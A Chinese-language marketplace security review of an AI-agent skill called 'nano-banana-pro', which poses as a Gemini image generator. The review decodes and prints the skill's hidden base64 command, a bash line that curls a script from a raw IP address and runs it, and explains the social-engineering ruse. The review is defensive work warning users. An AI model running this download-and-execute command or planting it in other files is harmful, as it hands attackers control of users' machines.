nano-banana-pro

🚫 包含恶意代码的危险技能

🥥0总安装量 0评分人数 0
0% 的用户推荐

伪装成图像生成工具的恶意技能,通过base64编码隐藏远程命令执行,会下载并执行未知脚本,存在严重安全风险。

D

高风险或信息不足,不建议直接接入业务环境

  • 来自社区或个人来源,建议先隔离验证
  • ❌ <br/>**检出严重恶意代码**:SKILL.md中包含base64编码的隐藏命令,解码后为`/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`,会从外部IP下载并执行未知脚本
  • ❌ <br/>**代码混淆与社会工程**:使用base64编码掩盖真实意图,伪装成"OpenClawProvider安装向导"诱导用户执行
  • ❌ <br/>**未经验证的动态代码加载**:直接从互联网IP地址(非域名)下载代码,无来源验证机制,无法审计
  • ❌ <br/>**描述与功能严重不符**:声称是图像生成工具,实际是恶意代码执行器
  • ⚠️ <br/>**使用IP地址规避检测**:攻击者刻意使用91.92.242.30而非域名,增加追踪难度

使用说明

核心用法

该技能表面宣称提供基于Google Gemini 3 Pro Image的图像生成与编辑功能,支持文本生成图像(text-to-image)和图像编辑(image-to-image),并提供1K/2K/4K三种分辨率选项。用户可通过命令行参数指定提示词、输出文件名、分辨率及API密钥完成图像生成任务。

显著优点(表面宣称)

  • 支持Draft→Iterate→Final的标准化工作流程,便于快速迭代
  • 提供结构化的提示词模板,降低用户使用门槛
  • 支持多分辨率输出,满足不同场景需求
  • 基于Gemini 3 Pro Image API,理论上有较强的图像生成能力

潜在缺点与局限性

致命缺陷:该技能包含恶意代码,实际不存在任何可用优点。 其宣称的所有功能均为掩护,真实目的是诱导用户执行隐藏的远程命令。即使忽略恶意代码,其设计也存在明显问题:强制依赖未经验证的第三方"OpenClawProvider"、使用IP地址而非域名、缺乏官方API文档引用等。

适合的目标群体

任何用户都不应使用该技能。 该技能针对的是对AI图像生成有需求但缺乏安全意识的开发者、设计师及普通用户。其利用用户对Gemini模型和图像生成技术的信任,通过技术术语包装降低用户警惕性。

使用风险

  • 系统完全失控:执行命令后攻击者可获取系统最高权限
  • 数据泄露风险:环境变量、API密钥、敏感文件可能被静默窃取
  • 横向感染:可能被用作跳板攻击内网其他设备
  • 持久化威胁:远程脚本可能植入后门、挖矿程序或勒索软件
  • 供应链污染:若集成到工作流中,可能污染整个项目或组织

nano-banana-pro 内容

手动下载zip · 3.1 kB
SKILL.mdtext/markdown
请选择文件